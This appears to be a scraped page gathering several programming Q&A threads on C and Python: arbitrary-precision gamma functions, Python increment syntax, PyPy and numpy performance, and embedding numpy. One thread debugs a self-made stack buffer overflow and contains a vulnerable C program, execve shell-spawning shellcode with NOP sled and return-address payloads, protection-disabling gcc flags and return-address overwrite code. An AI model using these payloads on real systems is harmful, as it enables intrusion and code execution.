high precision (~200 sig figs) incomplete gamma function callable in C [closed]

high precision (~200 sig figs) incomplete gamma function callable in C [closed] - python

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
We don’t allow questions seeking recommendations for books, tools, software libraries, and more. You can edit the question so it can be answered with facts and citations.
Closed 6 years ago.
Improve this question
im wondering if anyone knows of any libraries that allow for very high precision (200+ sig figs, preferably just arbitrary) incomplete gamma functions? So far the only thing i've found is mpmath for python, but I have no idea how I would incorporate that into C code, if that is even possible.
It could be in any language, just so long as I can somehow link it and call it from C.
Cheers

I think the GNU MP Bignum library is exactly what you're looking for.
You can do things like:
#include <stdio.h>
#include <gmp.h>
int main(int argc, char *argv[]) {
mpz_t a, b, c;
if (argc&lt3) {
printf("Please supply two numbers to add.\n");
return 1;
}
mpz_init_set_str (a, argv[1], 10);
mpz_init_set_str (b, argv[2], 10);
mpz_add (c, a, b);
printf("%s + %s => %s\n", argv[1], argv[2], mpz_get_str (NULL, 10, c));
return 0;
Compile with: gcc -o add_example add_example.c -lgmp -lm

As an alternative route, you could use a mathematical application that supports running in batch like Maxima, Mathematica or Matlab.
I tried the following Maxima script:
fpprec : 200;
fpprintprec : 200;
bfloat(gamma_incomplete(2,bfloat(2.3)));
Running it like this: maxima -q -b ./incompletegamma.mc run gives:
(%i1) batch("./gamma.mc")
read and interpret file: ./gamma.mc
(%i2) fpprec:200
(%o2) 200
(%i3) fpprintprec:1000
(%o3) 1000
(%i4) bfloat(gamma_incomplete(2,bfloat(2.3)))
(%o4) 3.3085418428525236227076532372691440857133290256546276037973522730841281\
226873248876116604879039570340226922621099906787322361219389317316508680513479\
116358485422369818232009561056364657588558639170139b-1
You can use system() or call() to run the maxima script from a python application like this:
from subprocess import call
call(["maxima", "-q -b ./incompletegamma.mc run"])

Related

C++ vs Python implementation [closed]

Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 4 years ago.
Improve this question
My C++ is functioning as expected but the equivalent Python code hangs in an infinite loop. Help!
C++
#include <iostream>
using namespace std;
int main()
{
for(int i=0;i<4;++i){
int j=0;
while(i!=j){
++j;
cout<<j<<endl;
}
}
}
Python
for i in range(4):
j = 0
while i != j:
++j
print(j)

++j is not a thing in Python. You want j += 1.

In order to avoid ambiguity/confusion, our Benevolent Dictator For Life thought to not allow ++ or -- into the Python ecosystem. That means you are in an infinite loop because ++j does not do what you believe it to do.

Why is my stack buffer overflow exploit not working?

So I have a really simple stackoverflow:
#include <stdio.h>
int main(int argc, char *argv[]) {
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);
}
I'm trying to overflow with this code:
$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.
Does anyone see the problem? Note: My python may be wrong.
UPDATE
What I don't understand is why my code is not executing. For instance if I point eip to nops, the nops never get executed. Like so,
$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
UPDATE
Could someone be kind enough to exploit this overflow yourself on linux
x86 and post the results?
UPDATE
Nevermind ya'll, I got it working. Thanks for all your help.
UPDATE
Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.
All Im doing is overflowing the stack at the beginning and pointing my shellcode there.
Like so,
r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
This should point to the A's. Now what I dont understand is why my address at the end gets changed in gdb.
This is what gdb gives me,
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?
When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?
Any help would be appreciated.
Also, I'm compiling with the following options:
gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
It's really odd because any other address works except the one I need.
UPDATE
I can successfully spawn a shell with the following in gdb,
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten eip is changed by gdb. Does anyone know what I am missing? Also, I can only spwan a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb and then gdb stops working.
For instance, now when I run the following I get this in gdb...
Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
This seems to be caused by execstack be turned on.
UPDATE
Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.

There are several protections, for the attack straight from the
compiler. For example your stack may not be executable.
readelf -l <filename>
if your output contains something like this:
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
this means that you can only read and write on the stack ( so you should "return to libc" to spawn your shell).
Also there could be a canary protection, meaning there is a part of the memory between your variables and the instruction pointer that contains a phrase that is checked for integrity and if it is overwritten by your string the program will exit.
if your are trying this on your own program consider removing some of the protections with gcc commands:
gcc -z execstack
Also a note on your assembly, you usually include nops before your shell code, so you don't have to target the exact address that your shell code is starting.
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
Note that in the address that should be placed inside the instruction pointer
you can modify the last hex digits to point somewhere inside your nops and not
necessarily at the beginning of your buffer.
Of course gdb should become your best friend if you are trying something
like that.
Hope this helps.

This isn't going to work too well [as written]. However, it is possible, so read on ...
It helps to know what the actual stack layout is when the main function is called. It's a bit more complicated than most people realize.
Assuming a POSIX OS (e.g. linux), the kernel will set the stack pointer at a fixed address.
The kernel does the following:
It calculates how much space is needed for the environment variable strings (i.e. strlen("HOME=/home/me") + 1 for all environment variables and "pushes" these strings onto the stack in a downward [towards lower memory] direction. It then calculates how many there were (e.g. envcount) and creates an char *envp[envcount + 1] on the stack and fills in the envp values with pointers to the given strings. It null terminates this envp
A similar process is done for the argv strings.
Then, the kernel loads the ELF interpreter. The kernel starts the process with the starting address of the ELF interpreter. The ELF interpreter [eventually] invokes the "start" function (e.g. _start from crt0.o) which does some init and then calls main(argc,argv,envp)
This is [sort of] what the stack looks like when main gets called:
"HOME=/home/me"
"LOGNAME=me"
"SHELL=/bin/sh"
// alignment pad ...
char *envp[4] = {
// address of "HOME" string
// address of "LOGNAME" string
// address of "SHELL" string
NULL
};
// string for argv[0] ...
// string for argv[1] ...
// ...
char *argv[] = {
// pointer to argument string 0
// pointer to argument string 1
// pointer to argument string 2
NULL
}
// possibly more stuff put in by ELF interpreter ...
// possibly more stuff put in by _start function ...
On an x86, the argc, argv, and envp pointer values are put into the first three argument registers of the x86 ABI.
Here's the problem [problems, plural, actually] ...
By the time all this is done, you have little to no idea what the address of the shell code is. So, any code you write must be RIP-relative addressing and [probably] built with -fPIC.
And, the resultant code can't have a zero byte in the middle because this is being conveyed [by the kernel] as an EOS terminated string. So, a string that has a zero (e.g. <byte0>,<byte1>,<byte2>,0x00,<byte5>,<byte6>,...) would only transfer the first three bytes and not the entire shell code program.
Nor do you have a good idea as to what the stack pointer value is.
Also, you need to find the memory word on the stack that has the return address in it (i.e. this is what the start function's call main asm instruction pushes).
This word containing the return address must be set to the address of the shell code. But, it doesn't always have a fixed offset relative to a main stack frame variable (e.g. buf). So, you can't predict what word on the stack to modify to get the "return to shellcode" effect.
Also, on x86 architectures, there is special mitigation hardware. For example, a page can be marked NX [no execute]. This is usually done for certain segments, such as the stack. If the RIP is changed to point to the stack, the hardware will fault out.
Here's the [easy] solution ...
gcc has some intrinsic functions that can help: __builtin_return_address, __builtin_frame_address.
So, get the value of the real return address from the intrinsic [call this retadr]. Get the address of the stack frame [call this fp].
Starting from fp and incrementing (by sizeof(void*)) toward higher memory, find a word that matches retadr. This memory location is the one you want to modify to point to the shell code. It will probably be at offset 0 or 8
So, then do: *fp = argv[1] and return.
Note, extra steps may be necessary because if the stack has the NX bit set, the string pointed to by argv[1] is on the stack as mentioned above.
Here is some example code that works:
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
void
shellcode(void)
{
static char buf[] = "shellcode: hello\n";
char *cp;
for (cp = buf; *cp != 0; ++cp);
// NOTE: in real shell code, we couldn't rely on using this function, so
// these would need to be the CPP macro versions: _syscall3 and _syscall2
// respectively or the syscall function would need to be _statically_
// linked in
syscall(SYS_write,1,buf,cp - buf);
syscall(SYS_exit,0);
}
int
main(int argc,char **argv)
{
void *retadr = __builtin_return_address(0);
void **fp = __builtin_frame_address(0);
int iter;
printf("retadr=%p\n",retadr);
printf("fp=%p\n",fp);
// NOTE: for your example, replace:
// *fp = (void *) shellcode;
// with:
// *fp = (void *) argv[1]
for (iter = 20; iter > 0; --iter, fp += 1) {
printf("fp=%p %p\n",fp,*fp);
if (*fp == retadr) {
*fp = (void *) shellcode;
break;
}
}
if (iter <= 0)
printf("main: no match\n");
return 0;
}

I was having similar problems when trying to perform a stack buffer overflow. I found that my return address in GDB was different than that in a normal process. What I did was add the following:
unsigned long printesp(void){
__asm__("movl %esp,%eax");
}
And called it at the end of main right before Return to get an idea where the stack was. From there I just played with that value subtracting 4 from the printed ESP until it worked.

Pypy (python) optimization

I'm looking into replacing some C code with python code and using pypy as the interpreter. The code does a lot of list/dictionary operations. Therefore to get a vague idea of the performance of pypy vs C I am writing sorting algorithms. To test all my read functions I wrote a bubble sort, both in python and C++. CPython of course sucks 6.468s, pypy came in at 0.366s and C++ at 0.229s. Then I remembered that I had forgotten -O3 on the C++ code and the time went to 0.042s. For a 32768 dataset C++ with -O3 is only 2.588s and pypy is 19.65s. Is there anything I can do to speed up my python code (besides using a better sort algorithm of course) or how I use pypy (some flag or something)?
Python code (read_nums module omitted since it's time is trivial: 0.036s on 32768 dataset):
import read_nums
import sys
nums = read_nums.read_nums(sys.argv[1])
done = False
while not done:
done = True
for i in range(len(nums)-1):
if nums[i] > nums[i+1]:
nums[i], nums[i+1] = nums[i+1], nums[i]
done = False
$ time pypy-c2.0 bubble_sort.py test_32768_1.nums
real 0m20.199s
user 0m20.189s
sys 0m0.009s
C code (read_nums function again omitted since it takes little time: 0.017s):
#include <iostream>
#include "read_nums.h"
int main(int argc, char** argv)
{
std::vector<int> nums;
int count, i, tmp;
bool done;
if(argc < 2)
{
std::cout << "Usage: " << argv[0] << " filename" << std::endl;
return 1;
}
count = read_nums(argv[1], nums);
done = false;
while(!done)
{
done = true;
for(i=0; i<count-1; ++i)
{
if(nums[i] > nums[i+1])
{
tmp = nums[i];
nums[i] = nums[i+1];
nums[i+1] = tmp;
done = false;
}
}
}
for(i=0; i<count; ++i)
{
std::cout << nums[i] << ", ";
}
return 0;
}
$ time ./bubble_sort test_32768_1.nums > /dev/null
real 0m2.587s
user 0m2.586s
sys 0m0.001s
P.S. Some of the numbers given in the first paragraph are a little different then the numbers from time because they're the numbers I got the first time.
Further improvements:
Just tried xrange instead of range and the run time went to 16.370s.
Moved the code starting from first done = False to last done = False in a function, speed is now 8.771-8.834s.

The most relevant way to answer this question is to note that the speed of C, CPython and PyPy are not differing by a constant factor: it depends most importantly on what is done and the way it is written. For example, if your C code is doing naive things like walking arrays when the "equivalent" Python code would naturally use dictionaries, then any implementation of Python is faster than C provided the arrays are long enough. Of course, this is not the case on most real-life examples, but the same argument still applies to a smaller extent. There is no one-size-fits-all way to predict the relative speed of a program written in C, or rewritten in Python and running on CPython or PyPy.
Obviously there are guidelines about these relative speeds: on small algorithmical examples you could expect the speed of PyPy to be approaching that of "gcc -O0". In your example it is "only" 1.6x slower. We might help you optimize it, or even find optimizations missing in PyPy, in order to gain 10% or 30% more speed. But this is a tiny example that has nothing to do with your real program. For the reasons above the speed we get here is only vaguely related to the speed you'll get in the end.
I can only say that rewriting code from C to Python for reasons of clarity, notably when the C has become too tangled up for further developments, is clearly a win in the long run --- even in the case where at the end you need to rewrite some parts of it in C again. And PyPy's goal here is to reduce the need for that. While it would be nice to say that no-one ever needs C any more, it's just not true :-)

Why is my python/numpy example faster than pure C implementation?

I have pretty much the same code in python and C. Python example:
import numpy
nbr_values = 8192
n_iter = 100000
a = numpy.ones(nbr_values).astype(numpy.float32)
for i in range(n_iter):
a = numpy.sin(a)
C example:
#include <stdio.h>
#include <math.h>
int main(void)
{
int i, j;
int nbr_values = 8192;
int n_iter = 100000;
double x;
for (j = 0; j < nbr_values; j++){
x = 1;
for (i=0; i<n_iter; i++)
x = sin(x);
}
return 0;
}
Something strange happen when I ran both examples:
$ time python numpy_test.py
real 0m5.967s
user 0m5.932s
sys 0m0.012s
$ g++ sin.c
$ time ./a.out
real 0m13.371s
user 0m13.301s
sys 0m0.008s
It looks like python/numpy is twice faster than C. Is there any mistake in the experiment above? How you can explain it?
P.S. I have Ubuntu 12.04, 8G ram, core i5 btw

First, turn on optimization. Secondly, subtleties matter. Your C code is definitely not 'basically the same'.
Here is equivalent C code:
sinary2.c:
#include <math.h>
#include <stdlib.h>
float *sin_array(const float *input, size_t elements)
{
int i = 0;
float *output = malloc(sizeof(float) * elements);
for (i = 0; i < elements; ++i) {
output[i] = sin(input[i]);
}
return output;
}
sinary.c:
#include <math.h>
#include <stdlib.h>
extern float *sin_array(const float *input, size_t elements)
int main(void)
{
int i;
int nbr_values = 8192;
int n_iter = 100000;
float *x = malloc(sizeof(float) * nbr_values);
for (i = 0; i < nbr_values; ++i) {
x[i] = 1;
}
for (i=0; i<n_iter; i++) {
float *newary = sin_array(x, nbr_values);
free(x);
x = newary;
}
return 0;
}
Results:
$ time python foo.py
real 0m5.986s
user 0m5.783s
sys 0m0.050s
$ gcc -O3 -ffast-math sinary.c sinary2.c -lm
$ time ./a.out
real 0m5.204s
user 0m4.995s
sys 0m0.208s
The reason the program has to be split in two is to fool the optimizer a bit. Otherwise it will realize that the whole loop has no effect at all and optimize it out. Putting things in two files doesn't give the compiler visibility into the possible side-effects of sin_array when it's compiling main and so it has to assume that it actually has some and repeatedly call it.
Your original program is not at all equivalent for several reasons. One is that you have nested loops in the C version and you don't in Python. Another is that you are working with arrays of values in the Python version and not in the C version. Another is that you are creating and discarding arrays in the Python version and not in the C version. And lastly you are using float in the Python version and double in the C version.
Simply calling the sin function the appropriate number of times does not make for an equivalent test.
Also, the optimizer is a really big deal for C. Comparing C code on which the optimizer hasn't been used to anything else when you're wondering about a speed comparison is the wrong thing to do. Of course, you also need to be mindful. The C optimizer is very sophisticated and if you're testing something that really doesn't do anything, the C optimizer might well notice this fact and simply not do anything at all, resulting in a program that's ridiculously fast.

Because "numpy" is a dedicated math library implemented for speed. C has standard functions for sin/cos, that are generally derived for accuracy.
You are also not comparing apples with apples, as you are using double in C, and float32 (float) in python. If we change the python code to calculate float64 instead, the time increases by about 2.5 seconds on my machine, making it roughly match with the correctly optimized C version.
If the whole test was made to do something more complicated that requires more control structres (if/else, do/while, etc), then you would probably see even less difference between C and Python - because the C compiler can't really do "sin" any faster - unless you implement a better "sin" function.
Newer mind the fact that your code isn't quite the same on both sides... ;)

You seem to be doing the the same operation in C 8192 x 10000 times but only 10000 in python (I haven't used numpy before so I may misunderstand the code). Why are you using an array in the python case (again I'm not use to numpy so perhaps the dereferencing is implicit). If you wish to use an array be careful doubles have a performance hit in terms of caching and optimised vectorisation - you're using different types between both implementations (float vs double) but given the algorithm I don't think it matters.
The main reason for a lot of anomalous performance benchmark issues surrounding C vs Pythis, Pythat... Is that simply the C implementation is often poor.
https://www.ibm.com/developerworks/community/blogs/jfp/entry/A_Comparison_Of_C_Julia_Python_Numba_Cython_Scipy_and_BLAS_on_LU_Factorization?lang=en
If you notice the guy writes C to process an array of doubles (without using restrict or const keywords where he could've), he builds with optimisation then forces the compiler to use SIMD rather than AVE. In short the compiler is using an inefficient instruction set for doubles and the wrong type of registers too if he wanted performance - you can be sure the numba and numpy will be using as many bells and whistles as possible and will be shipped with very efficient C and C++ libraries to begin with. In short if you want speed with C you have to think about it, you may even have to disassemble the code and perhaps disable optimisation and use compiler instrinsics instead. It gives you the tools to do it so don't expect the compiler to do all the work for you. If you want that degree of freedom use Cython, Numba, Numpy, Scipy etc. They're very fast but you won't be able to eek out every bit of performance out of the machine - to do that use C, C++ or new versions of FORTRAN.
Here is a very good article on these very points (I'd use SciPy):
https://www.scipy.org/scipylib/faq.html

Embedded python - error while Numpy importing

I am trying to embed python 2.7.3 in C++ and use Numpy library and I obtain runtime error while importing Numpy for the second time. Here is a simple code example (as smallest as possible) :
#include <Python.h>
int main() {
for(int i=0 ; i<2 ; i++) {
Py_Initialize() ;
PyImport_ImportModule("numpy");
Py_Finalize() ;
}
return 0 ;
}
What's wrong with this ?

From the Py_Finalize documentation docs you have:
Some extensions may not work properly if their initialization routine is called more than
once; this can happen if an application calls Py_Initialize() and
Py_Finalize() more than once.
I wouldn't be surprised if Numpy is one of these extensions.
Update: looks like it is, see this question.

We Keep Coding

Python is a programming language that lets you work quickly and integrate systems more effectively.